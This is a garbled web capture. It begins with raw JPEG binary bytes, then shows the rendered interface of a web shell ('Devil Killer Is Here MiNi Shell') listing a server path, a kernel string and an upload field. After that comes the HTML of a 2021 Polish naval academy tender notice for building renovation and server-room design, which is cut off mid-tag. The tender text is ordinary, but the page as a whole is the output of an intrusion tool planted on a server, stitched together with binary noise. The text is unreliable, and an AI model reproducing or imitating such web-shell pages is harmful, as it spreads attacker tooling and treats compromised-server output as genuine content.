JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210623/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210623/0009201001-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00092010 z dnia 2021-06-23</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie dokumentacji projektowo-kosztorysowej na terenie AMW, przy ul. Śmidowicza 69, 81-127 Gdynia, wraz z uzyskaniem prawomocnego pozwolenia na budowę z podziałem na części </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Akademia Marynarki Wojennej im. Bohaterów Westerplatte</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 190064136</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Inżyniera Jana Śmidowicza, 69</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdynia</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">81-127</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">261262537</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@amw.gdynia.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.amw.gdynia.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie dokumentacji projektowo-kosztorysowej na terenie AMW, przy ul. Śmidowicza 69, 81-127 Gdynia, wraz z uzyskaniem prawomocnego pozwolenia na budowę z podziałem na części </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-eefc35df-d415-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00092010</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00014768/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Wykonanie dokumentacji projektowo-kosztorysowej na remont elewacji w budynku nr 3</p> <p class="mb-0">1.3.4 Wykonanie dokumentacji projektowo-kosztorysowej w zakresie remontu pomieszczeń w budynku nr 3</p> <p class="mb-0">1.3.5 Wykonanie dokumentacji projektowo-kosztorysowej na na remont elewacji w budynku nr 4</p> <p class="mb-0">1.3.6 Wykonanie dokumentacji projektowo-kosztorysowej na adaotację pomieszczeń piwnicznych na serwerownię dla informatyki w budynku nr 4</p> <p class="mb-0">1.3.3 Wykonanie dokumentacji projektowo-kosztorysowej na remont elewacji w budynku nr 3</p> <p class="mb-0">1.3.4 Wykonanie dokumentacji projektowo-kosztorysowej w zakresie remontu pomieszczeń w budynku nr 3</p> <p class="mb-0">1.3.5 Wykonanie dokumentacji projektowo-kosztorysowej na na remont elewacji w budynku nr 4</p> <p class="mb-0">1.3.6 Wykonanie dokumentacji projektowo-kosztorysowej na adaotację pomieszczeń piwnicznych na serwerownię dla informatyki w budynku nr 4</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegółowe określenie wymagań technicznych i organizacyjnych dotyczących korespondencji elektronicznej zawarto w rozdziale 8 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Szczegółowe określenie zasad związanych z obowiązkiem<br/>informacyjnym RODO zawarto w rozdziale 39 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">31/ZP/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szczegółowy zakres Części I:<br/>1)	Inwentaryzacja wielobranżowa elewacji w części fundamentowo-cokołowej w wymaganym zakresie. <br/>2)	Ocena stanu technicznego istniejącego elewacji w części fundamentowo-cokołowej, w tym m.in. izolacje przeciwwilgociowe, termoizolacje, tynki, opaski dookoła budynku, murki studni okiennych, pogłębienie studni doświetlających wraz z odprowadzeniem z nich wód opadowych, kraty w otworach okiennych, parapety, schody zewnętrzne, balustrady, miejsca odprowadzenia wód deszczo-wych, obudowy studni terenowych w rejonie budynku nr 3, skrzynek przyłącze-niowych i ich posadowienia.<br/>3)	Projekt remontu elewacji uwzględniający w części fundamentowo-cokołowej:<br/>a)	skucie i wykonanie hydroizolacji i termoizolacji,<br/>b)	wykonanie tynków cokołowych,<br/>c)	odtworzenie opasek dookoła budynku i w bezpośrednim sąsiedztwie,<br/>d)	odtworzenie murków studni okiennych, pogłębienie studni wraz z odprowadzeniem wód opadowych,<br/>e)	renowację krat w otworach okiennych,<br/>f)	wymianę parapetów,<br/>g)	naprawę miejsc odprowadzenia wód deszczowych- podejście pod rynny,<br/>h)	otworzenie obudów studni terenowych,<br/>i)	naprawę lub wymianę skrzynek przyłączeniowych,<br/>j)	naprawę z uzupełnieniem lub wymianę puszek i innych elementów instalacji wmontowanych w elewację,<br/>k)	usunięcie wszelkich zbędnych instalacji poprowadzonych po elewacjach,<br/>l)	wymianę tabliczek znamionowych w przypadku ich występowania,<br/>m)	ocena stanu technicznego stolarki okiennej i drzwiowej zewnętrznej i wymiana stolarki w złym stanie technicznym za akceptacją zamawiającego.<br/>4)	Inwentaryzacja wielobranżowa elewacji w części ponad cokołem w wymaganym zakresie. <br/>5)	Ocena stanu technicznego istniejącego elewacji w części ponad cokołem w tym m.in. tynki, izolacje termiczne, parapety, kraty w otworach okiennych, zadaszenia nad wejściami, gzymsy, rury spustowe, rynny, opierzenia, obróbki blacharskie. <br/>6)	Projekt remontu elewacji w części ponad cokołem uwzględniający: <br/>a)	naprawę gzymsów,<br/>b)	naprawę ubytków tynków i izolacji, <br/>c)	remont ścian elewacji,<br/>d)	renowację lub wymianę krat w otworach okiennych,<br/>e)	wymianę parapetów,<br/>f)	naprawę lub wymianę balustrad balkonowych w zależności od wyniku oceny technicznej,<br/>g)	wymianę zadaszeń nad wejściami,<br/>h)	naprawę lub wymianę uszkodzonych obróbek blacharskich,<br/>i)	naprawę lub wymianę wraz z malowaniem rynien, rur spustowych, z naprawą odprowadzenia wód deszczowych, <br/>j)	naprawę z uzupełnieniem lub wymianę puszek i innych elementów instalacji wmontowanych w elewację,<br/>k)	usunięcie wszelkich zbędnych instalacji poprowadzonych po elewacjach,<br/>l)	na przewodach odprowadzających przy dachu lub zwodach na dachu kapinosy uniemożliwiające ściekanie wody pod ocieplenie,<br/>m)	wymianę oświetlenia zewnętrznego, <br/>n)	wymianę tabliczek znamionowych,<br/>o)	wymianę instalacji odgromowej,<br/>p)	ocena stanu technicznego stolarki okiennej i drzwiowej zewnętrznej i wymiana stolarki w złym stanie technicznym za akceptacją Zamawiającego.<br/>7)	Dobór rozwiązań materiałowych uwzględniających stan techniczny istniejący, <br/> obecne trendy materiałowe, należy przedstawić Zamawiającemu do akceptacji <br/> i uzgodnienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">180 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres aktualizacji kosztorysów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szczegółowy zakres Części II:<br/>1)	Inwentaryzacja wielobranżowa pomieszczeń w wymaganym zakresie. <br/>2)	Projekt wielobranżowy w zakresie dwóch pomieszczeń sanitarnych nr 0.3. i 0.4. na kondygnacji piwnicy ma objąć:<br/>a)	wykonanie pompy cyrkulacyjnej na instalacji wodociągowej<br/>b)	wymianę okładzin podłogowych i ściennych<br/>c)	wymiana stolarki okiennej i drzwiowej<br/>d)	wykonanie napraw w tynku i gładzi<br/>e)	wykonanie powłok malarskich ściennych i sufitowych<br/>f)	udrożnienie wentylacji i wymiana kratek wentylacyjnych<br/>g)	wymiana instalacji kanalizacji sanitarnej<br/>h)	wymiana instalacji elektrycznej oświetlenia, włączników, gniazd wtykowych<br/>i)	wymiana misek ustępowych, pisuarów, umywalek, baterii, dozowników mydła i papieru, w standardzie jak dla obiektu użyteczności publicznej, ze szczegółowy-mi opisami parametrów w części opisowej projektu,<br/>3)	Dwa warianty koncepcji z doborem rozwiązań uwzględniających stan techniczny <br/> istniejący, obecne trendy materiałowe należy przedstawić Zamawiającemu do <br/> akceptacji i uzgodnienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">180 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres aktualizacji kosztorysów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szczegółowy zakres Części III:<br/>1)	Inwentaryzacja wielobranżowa elewacji w części fundamentowo-cokołowej w wymaganym zakresie. <br/>2)	Ocena stanu technicznego istniejącego elewacji w części fundamentowo-cokołowej, w tym m.in. izolacje przeciwwilgociowe, termoizolacje, tynki, opaski dookoła budynku, murki studni okiennych, pogłębienie studni doświetlających wraz z odprowadzeniem z nich wód opadowych, kraty w otworach okiennych, pa-rapety, schody zewnętrzne, balustrady, miejsca odprowadzenia wód deszczowych, obudowy studni terenowych w rejonie budynku nr 4, skrzynek przyłączeniowych i ich posadowienia.<br/>3)	Projekt remontu elewacji uwzględniający w części fundamentowo-cokołowej:<br/>a)	skucie i wykonanie hydroizolacji i termoizolacji,<br/>b)	wykonanie tynków cokołowych,<br/>c)	odtworzenie opasek dookoła budynku i w bezpośrednim sąsiedztwie,<br/>d)	odtworzenie murków studni okiennych, pogłębienie studni wraz z odprowadze-niem wód opadowych,<br/>e)	renowację krat w otworach okiennych,<br/>f)	wymianę parapetów,<br/>g)	naprawę ubytków w schodach zewnętrznych wraz z wykonaniem hydroizolacji, tynków, okładzin, z uwzględnieniem zapewnienia odwodnienia z krat podesto-wych,<br/>h)	naprawę lub wymianę balustrad w zależności od wyniku oceny technicznej,<br/>i)	naprawę miejsc odprowadzenia wód deszczowych- podejście pod rynny,<br/>j)	naprawę lub wymianę skrzynek przyłączeniowych,<br/>k)	naprawę z uzupełnieniem lub wymianę puszek i innych elementów instalacji wmontowanych w elewację,<br/>l)	usunięcie wszelkich zbędnych instalacji poprowadzonych po elewacjach,<br/>m)	wymianę tabliczek znamionowych,<br/>n)	wymianę zadaszeń nad wejściami,<br/>o)	ocena stanu technicznego stolarki okiennej i drzwiowej zewnętrznej i wymiana stolarki w złym stanie technicznym za akceptacją zamawiającego.<br/>4)	Inwentaryzacja wielobranżowa elewacji w części ponad cokołem w wymaganym zakresie. <br/>5)	Ocena stanu technicznego istniejącego elewacji w części ponad cokołem w tym m.in. tynki, izolacje, parapety, kraty w otworach okiennych, zadaszenia nad wej-ściami, gzymsy, rury spustowe, rynny, opierzenia. <br/>6)	Projekt remontu elewacji w części ponad cokołem uwzględniający: <br/>a)	naprawę gzymsów,<br/>b)	naprawę ubytków tynków i izolacji, <br/>c)	remont ścian elewacji,<br/>d)	renowację lub wymianę krat w otworach okiennych,<br/>e)	wymianę parapetów,<br/>f)	wymianę zadaszeń nad wejściami<br/>g)	naprawę lub wymianę uszkodzonych obróbek blacharskich,<br/>h)	naprawę lub wymianę wraz z malowaniem rynien, rur spustowych, z naprawą odprowadzenia wód deszczowych, <br/>i)	naprawę z uzupełnieniem lub wymianę puszek i innych elementów instalacji wmontowanych w elewację,<br/>j)	usunięcie wszelkich zbędnych instalacji poprowadzonych po elewacjach,<br/>k)	na przewodach odprowadzających przy dachu lub zwodach na dachu kapinosy uniemożliwiające ściekanie wody pod ocieplenie,<br/>l)	wymianę tabliczek znamionowych,<br/>m)	wymianę oświetlenia zewnętrznego,<br/>n)	wymianę instalacji odgromowej.<br/>o) ocena stanu technicznego stolarki okiennej i drzwiowej zewnętrznej i wymiana stolarki w złym stanie technicznym za akceptacją zamawiającego.<br/>7)	Dobór rozwiązań materiałowych uwzględniających stan techniczny istniejący, <br/> obecne trendy materiałowe należy przedstawić Zamawiającemu do akceptacji <br/> i uzgodnienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">180 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres aktualizacji kosztorysów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szczegółowy zakres Części IV:<br/>1)	Inwentaryzacja wielobranżowa pomieszczenia w wymaganym zakresie. <br/>2)	Projekt wielobranżowy w zakresie adaptacji jednego pomieszczenia piwnicznego na serwerownię dla informatyki, na kondygnacji piwnicy ma objąć:<br/>a)	wymianę okładzin podłogowych, <br/>b)	skucie zawilgoconych tynków w strefie cokołowej i w rejonie otworu okiennego,<br/>c)	wykonanie napraw w tynku i gładzi wraz z odgrzybieniem,<br/>d)	wykonanie powłok malarskich ściennych i sufitowych,<br/>e)	wymiana stolarki drzwiowej na antywłamaniową,<br/>f)	wykonanie instalacji elektrycznej oświetleniowej, gniazd wtykowych z równo-miernym rozmieszczeniem ich w pomieszczeniu,<br/>g)	przystosowanie pomieszczenia na serwerownię dla 16-20 urządzeń, z których każde wyposażone będzie w zasilacz o mocy 2000W,<br/>h)	zapewnienie mocy przyłączeniowej dla urządzeń w serwerowni min. 40kW,<br/>i)	zapewnienie zasilania dla pozostałych instalacji w pomieszczeniu,<br/>j)	montaż instalacji klimatyzacji o wymaganej wydajności- min. 4 jednostki ścien-ne,<br/>k)	montaż wentylacji mechanicznej, na podstawie przeprowadzonej inwentaryzacji i oceny technicznej,<br/>l)	montaż czujek zalania,<br/>m)	położenie kabla światłowodowego od 8 do 30 żył, do serwerowni w budynku 353,<br/>n)	wykonanie instalacji alarmowej.<br/>3)	Dobór rozwiązań uwzględniających stan techniczny istniejący, obecne trendy <br/> materiałowe należy przedstawić Zamawiającemu do akceptacji i uzgodnienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71000000-8 - Usługi architektoniczne, 